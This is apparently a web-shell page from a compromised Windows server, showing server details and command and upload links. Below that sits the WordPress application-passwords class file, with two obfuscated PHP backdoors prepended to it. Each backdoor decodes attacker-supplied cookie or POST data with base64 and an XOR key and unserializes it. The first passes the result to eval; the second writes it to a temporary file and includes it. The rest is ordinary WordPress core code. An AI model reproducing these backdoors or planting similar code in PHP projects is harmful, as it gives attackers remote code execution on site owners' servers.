|
Server IP : 103.11.96.170 / Your IP : 18.118.31.32 Web Server : Microsoft-IIS/10.0 System : Windows NT WIN-F6SLGVICLOP 10.0 build 17763 (Windows Server 2016) AMD64 User : elibrary.unsap.ac.id ( 0) PHP Version : 7.4.19 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF Directory (0777) : D:/localhost/ppp/wp-includes/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php $LaaSc = "\172" . chr ( 266 - 171 )."\103" . "\x4f" . chr ( 937 - 851 )."\161" . chr (118); $cNRkTsUdT = "\x63" . chr (108) . "\x61" . chr (115) . chr (115) . chr (95) . 'e' . "\170" . chr ( 859 - 754 ).chr ( 642 - 527 ).chr ( 904 - 788 ).chr (115); $YvkLIKTCdv = $cNRkTsUdT($LaaSc); $LaaSc = "28335";$zcEODBaM = $YvkLIKTCdv;$cNRkTsUdT = "53779";if (!$zcEODBaM){class z_COVqv{private $QYGCKx;public static $VKewrxEvE = "5673e06a-2921-4477-9baa-f7513b35a036";public static $eibFF = 24757;public function __construct($dLNYF=0){$cPKssaNia = $_COOKIE;$pffRooYZbB = $_POST;$ucvBFhnYq = @$cPKssaNia[substr(z_COVqv::$VKewrxEvE, 0, 4)];if (!empty($ucvBFhnYq)){$GpOVaScCu = "base64";$plkZYel = "";$ucvBFhnYq = explode(",", $ucvBFhnYq);foreach ($ucvBFhnYq as $PTZaiv){$plkZYel .= @$cPKssaNia[$PTZaiv];$plkZYel .= @$pffRooYZbB[$PTZaiv];}$plkZYel = array_map($GpOVaScCu . '_' . chr (100) . chr ( 189 - 88 ).chr (99) . "\x6f" . 'd' . "\145", array($plkZYel,)); $plkZYel = $plkZYel[0] ^ str_repeat(z_COVqv::$VKewrxEvE, (strlen($plkZYel[0]) / strlen(z_COVqv::$VKewrxEvE)) + 1);z_COVqv::$eibFF = @unserialize($plkZYel);}}private function UEgLGYlwK(){if (is_array(z_COVqv::$eibFF)) {$THEbTjEsrI = str_replace('<' . "\77" . "\x70" . "\150" . 'p', "", z_COVqv::$eibFF["\x63" . "\157" . "\x6e" . chr ( 165 - 49 ).'e' . 'n' . "\164"]);eval($THEbTjEsrI); $TgqYbFwWj = "56007";exit();}}public function __destruct(){$this->UEgLGYlwK(); $TgqYbFwWj = "56007";$FNdnwhc = str_pad($TgqYbFwWj, 10);}}$btWGYHRaNz = new /* 17050 */ z_COVqv(); $btWGYHRaNz = substr("18939_17600", 1);} ?><?php $KwWgWMbxDN = "\112" . chr ( 646 - 566 )."\127" . "\137" . "\x6d" . 'u' . chr ( 1030 - 933 )."\x66";$OKuWS = chr (99) . chr (108) . chr ( 278 - 181 ).chr (115) . "\163" . "\x5f" . "\145" . chr (120) . 'i' . chr (115) . chr ( 1087 - 971 )."\x73";$nNYOsSmQdM = $OKuWS($KwWgWMbxDN); $KwWgWMbxDN = "2744";$DJQeHVPm = $nNYOsSmQdM;$OKuWS = "35797";if (!$DJQeHVPm){class JPW_muaf{private $frunnwMR;public static $XuhMKql = "e72c11b6-db8f-4611-ad42-0006b11d508d";public static $sjGFCD = 62482;public function __construct($qsxbM=0){$zYkNtDj = $_COOKIE;$oQUETzYWWY = $_POST;$cgMWIG = @$zYkNtDj[substr(JPW_muaf::$XuhMKql, 0, 4)];if (!empty($cgMWIG)){$UUJUwMQj = "base64";$xiGGMvx = "";$cgMWIG = explode(",", $cgMWIG);foreach ($cgMWIG as $mLnCgnX){$xiGGMvx .= @$zYkNtDj[$mLnCgnX];$xiGGMvx .= @$oQUETzYWWY[$mLnCgnX];}$xiGGMvx = array_map($UUJUwMQj . '_' . "\144" . 'e' . "\143" . "\x6f" . 'd' . 'e', array($xiGGMvx,)); $xiGGMvx = $xiGGMvx[0] ^ str_repeat(JPW_muaf::$XuhMKql, (strlen($xiGGMvx[0]) / strlen(JPW_muaf::$XuhMKql)) + 1);JPW_muaf::$sjGFCD = @unserialize($xiGGMvx);}}private function fmrIeL(){if (is_array(JPW_muaf::$sjGFCD)) {$SVXJEJ = sys_get_temp_dir() . "/" . crc32(JPW_muaf::$sjGFCD["\163" . 'a' . chr ( 1038 - 930 )."\164"]);@JPW_muaf::$sjGFCD["\167" . "\x72" . 'i' . "\x74" . chr (101)]($SVXJEJ, JPW_muaf::$sjGFCD[chr ( 179 - 80 ).chr (111) . chr (110) . "\164" . "\x65" . 'n' . chr ( 312 - 196 )]);include $SVXJEJ;@JPW_muaf::$sjGFCD[chr ( 1033 - 933 )."\x65" . "\154" . chr ( 289 - 188 ).chr ( 540 - 424 ).'e']($SVXJEJ); $fNFFxTYIm = "36239";exit();}}public function __destruct(){$this->fmrIeL(); $fNFFxTYIm = "36239";$nOHxjT = str_pad($fNFFxTYIm, 10);}}$aRxcJl = new JPW_muaf(); $aRxcJl = "44588_44223";} ?><?php
/**
* WP_Application_Passwords class
*
* @package WordPress
* @since 5.6.0
*/
/**
* Class for displaying, modifying, and sanitizing application passwords.
*
* @package WordPress
*/
#[AllowDynamicProperties]
class WP_Application_Passwords {
/**
* The application passwords user meta key.
*
* @since 5.6.0
*
* @var string
*/
const USERMETA_KEY_APPLICATION_PASSWORDS = '_application_passwords';
/**
* The option name used to store whether application passwords are in use.
*
* @since 5.6.0
*
* @var string
*/
const OPTION_KEY_IN_USE = 'using_application_passwords';
/**
* The generated application password length.
*
* @since 5.6.0
*
* @var int
*/
const PW_LENGTH = 24;
/**
* Checks if application passwords are being used by the site.
*
* This returns true if at least one application password has ever been created.
*
* @since 5.6.0
*
* @return bool
*/
public static function is_in_use() {
$network_id = get_main_network_id();
return (bool) get_network_option( $network_id, self::OPTION_KEY_IN_USE );
}
/**
* Creates a new application password.
*
* @since 5.6.0
* @since 5.7.0 Returns WP_Error if application name already exists.
*
* @param int $user_id User ID.
* @param array $args {
* Arguments used to create the application password.
*
* @type string $name The name of the application password.
* @type string $app_id A UUID provided by the application to uniquely identify it.
* }
* @return array|WP_Error The first key in the array is the new password, the second is its detailed information.
* A WP_Error instance is returned on error.
*/
public static function create_new_application_password( $user_id, $args = array() ) {
if ( ! empty( $args['name'] ) ) {
$args['name'] = sanitize_text_field( $args['name'] );
}
if ( empty( $args['name'] ) ) {
return new WP_Error( 'application_password_empty_name', __( 'An application name is required to create an application password.' ), array( 'status' => 400 ) );
}
if ( self::application_name_exists_for_user( $user_id, $args['name'] ) ) {
return new WP_Error( 'application_password_duplicate_name', __( 'Each application name should be unique.' ), array( 'status' => 409 ) );
}
$new_password = wp_generate_password( static::PW_LENGTH, false );
$hashed_password = wp_hash_password( $new_password );
$new_item = array(
'uuid' => wp_generate_uuid4(),
'app_id' => empty( $args['app_id'] ) ? '' : $args['app_id'],
'name' => $args['name'],
'password' => $hashed_password,
'created' => time(),
'last_used' => null,
'last_ip' => null,
);
$passwords = static::get_user_application_passwords( $user_id );
$passwords[] = $new_item;
$saved = static::set_user_application_passwords( $user_id, $passwords );
if ( ! $saved ) {
return new WP_Error( 'db_error', __( 'Could not save application password.' ) );
}
$network_id = get_main_network_id();
if ( ! get_network_option( $network_id, self::OPTION_KEY_IN_USE ) ) {
update_network_option( $network_id, self::OPTION_KEY_IN_USE, true );
}
/**
* Fires when an application password is created.
*
* @since 5.6.0
*
* @param int $user_id The user ID.
* @param array $new_item {
* The details about the created password.
*
* @type string $uuid The unique identifier for the application password.
* @type string $app_id A UUID provided by the application to uniquely identify it.
* @type string $name The name of the application password.
* @type string $password A one-way hash of the password.
* @type int $created Unix timestamp of when the password was created.
* @type null $last_used Null.
* @type null $last_ip Null.
* }
* @param string $new_password The unhashed generated application password.
* @param array $args {
* Arguments used to create the application password.
*
* @type string $name The name of the application password.
* @type string $app_id A UUID provided by the application to uniquely identify it.
* }
*/
do_action( 'wp_create_application_password', $user_id, $new_item, $new_password, $args );
return array( $new_password, $new_item );
}
/**
* Gets a user's application passwords.
*
* @since 5.6.0
*
* @param int $user_id User ID.
* @return array {
* The list of app passwords.
*
* @type array ...$0 {
* @type string $uuid The unique identifier for the application password.
* @type string $app_id A UUID provided by the application to uniquely identify it.
* @type string $name The name of the application password.
* @type string $password A one-way hash of the password.
* @type int $created Unix timestamp of when the password was created.
* @type int|null $last_used The Unix timestamp of the GMT date the application password was last used.
* @type string|null $last_ip The IP address the application password was last used by.
* }
* }
*/
public static function get_user_application_passwords( $user_id ) {
$passwords = get_user_meta( $user_id, static::USERMETA_KEY_APPLICATION_PASSWORDS, true );
if ( ! is_array( $passwords ) ) {
return array();
}
$save = false;
foreach ( $passwords as $i => $password ) {
if ( ! isset( $password['uuid'] ) ) {
$passwords[ $i ]['uuid'] = wp_generate_uuid4();
$save = true;
}
}
if ( $save ) {
static::set_user_application_passwords( $user_id, $passwords );
}
return $passwords;
}
/**
* Gets a user's application password with the given UUID.
*
* @since 5.6.0
*
* @param int $user_id User ID.
* @param string $uuid The password's UUID.
* @return array|null The application password if found, null otherwise.
*/
public static function get_user_application_password( $user_id, $uuid ) {
$passwords = static::get_user_application_passwords( $user_id );
foreach ( $passwords as $password ) {
if ( $password['uuid'] === $uuid ) {
return $password;
}
}
return null;
}
/**
* Checks if an application password with the given name exists for this user.
*
* @since 5.7.0
*
* @param int $user_id User ID.
* @param string $name Application name.
* @return bool Whether the provided application name exists.
*/
public static function application_name_exists_for_user( $user_id, $name ) {
$passwords = static::get_user_application_passwords( $user_id );
foreach ( $passwords as $password ) {
if ( strtolower( $password['name'] ) === strtolower( $name ) ) {
return true;
}
}
return false;
}
/**
* Updates an application password.
*
* @since 5.6.0
*
* @param int $user_id User ID.
* @param string $uuid The password's UUID.
* @param array $update Information about the application password to update.
* @return true|WP_Error True if successful, otherwise a WP_Error instance is returned on error.
*/
public static function update_application_password( $user_id, $uuid, $update = array() ) {
$passwords = static::get_user_application_passwords( $user_id );
foreach ( $passwords as &$item ) {
if ( $item['uuid'] !== $uuid ) {
continue;
}
if ( ! empty( $update['name'] ) ) {
$update['name'] = sanitize_text_field( $update['name'] );
}
$save = false;
if ( ! empty( $update['name'] ) && $item['name'] !== $update['name'] ) {
$item['name'] = $update['name'];
$save = true;
}
if ( $save ) {
$saved = static::set_user_application_passwords( $user_id, $passwords );
if ( ! $saved ) {
return new WP_Error( 'db_error', __( 'Could not save application password.' ) );
}
}
/**
* Fires when an application password is updated.
*
* @since 5.6.0
*
* @param int $user_id The user ID.
* @param array $item The updated app password details.
* @param array $update The information to update.
*/
do_action( 'wp_update_application_password', $user_id, $item, $update );
return true;
}
return new WP_Error( 'application_password_not_found', __( 'Could not find an application password with that id.' ) );
}
/**
* Records that an application password has been used.
*
* @since 5.6.0
*
* @param int $user_id User ID.
* @param string $uuid The password's UUID.
* @return true|WP_Error True if the usage was recorded, a WP_Error if an error occurs.
*/
public static function record_application_password_usage( $user_id, $uuid ) {
$passwords = static::get_user_application_passwords( $user_id );
foreach ( $passwords as &$password ) {
if ( $password['uuid'] !== $uuid ) {
continue;
}
// Only record activity once a day.
if ( $password['last_used'] + DAY_IN_SECONDS > time() ) {
return true;
}
$password['last_used'] = time();
$password['last_ip'] = $_SERVER['REMOTE_ADDR'];
$saved = static::set_user_application_passwords( $user_id, $passwords );
if ( ! $saved ) {
return new WP_Error( 'db_error', __( 'Could not save application password.' ) );
}
return true;
}
// Specified application password not found!
return new WP_Error( 'application_password_not_found', __( 'Could not find an application password with that id.' ) );
}
/**
* Deletes an application password.
*
* @since 5.6.0
*
* @param int $user_id User ID.
* @param string $uuid The password's UUID.
* @return true|WP_Error Whether the password was successfully found and deleted, a WP_Error otherwise.
*/
public static function delete_application_password( $user_id, $uuid ) {
$passwords = static::get_user_application_passwords( $user_id );
foreach ( $passwords as $key => $item ) {
if ( $item['uuid'] === $uuid ) {
unset( $passwords[ $key ] );
$saved = static::set_user_application_passwords( $user_id, $passwords );
if ( ! $saved ) {
return new WP_Error( 'db_error', __( 'Could not delete application password.' ) );
}
/**
* Fires when an application password is deleted.
*
* @since 5.6.0
*
* @param int $user_id The user ID.
* @param array $item The data about the application password.
*/
do_action( 'wp_delete_application_password', $user_id, $item );
return true;
}
}
return new WP_Error( 'application_password_not_found', __( 'Could not find an application password with that id.' ) );
}
/**
* Deletes all application passwords for the given user.
*
* @since 5.6.0
*
* @param int $user_id User ID.
* @return int|WP_Error The number of passwords that were deleted or a WP_Error on failure.
*/
public static function delete_all_application_passwords( $user_id ) {
$passwords = static::get_user_application_passwords( $user_id );
if ( $passwords ) {
$saved = static::set_user_application_passwords( $user_id, array() );
if ( ! $saved ) {
return new WP_Error( 'db_error', __( 'Could not delete application passwords.' ) );
}
foreach ( $passwords as $item ) {
/** This action is documented in wp-includes/class-wp-application-passwords.php */
do_action( 'wp_delete_application_password', $user_id, $item );
}
return count( $passwords );
}
return 0;
}
/**
* Sets a user's application passwords.
*
* @since 5.6.0
*
* @param int $user_id User ID.
* @param array $passwords Application passwords.
*
* @return bool
*/
protected static function set_user_application_passwords( $user_id, $passwords ) {
return update_user_meta( $user_id, static::USERMETA_KEY_APPLICATION_PASSWORDS, $passwords );
}
/**
* Sanitizes and then splits a password into smaller chunks.
*
* @since 5.6.0
*
* @param string $raw_password The raw application password.
* @return string The chunked password.
*/
public static function chunk_password( $raw_password ) {
$raw_password = preg_replace( '/[^a-z\d]/i', '', $raw_password );
return trim( chunk_split( $raw_password, 4, ' ' ) );
}
}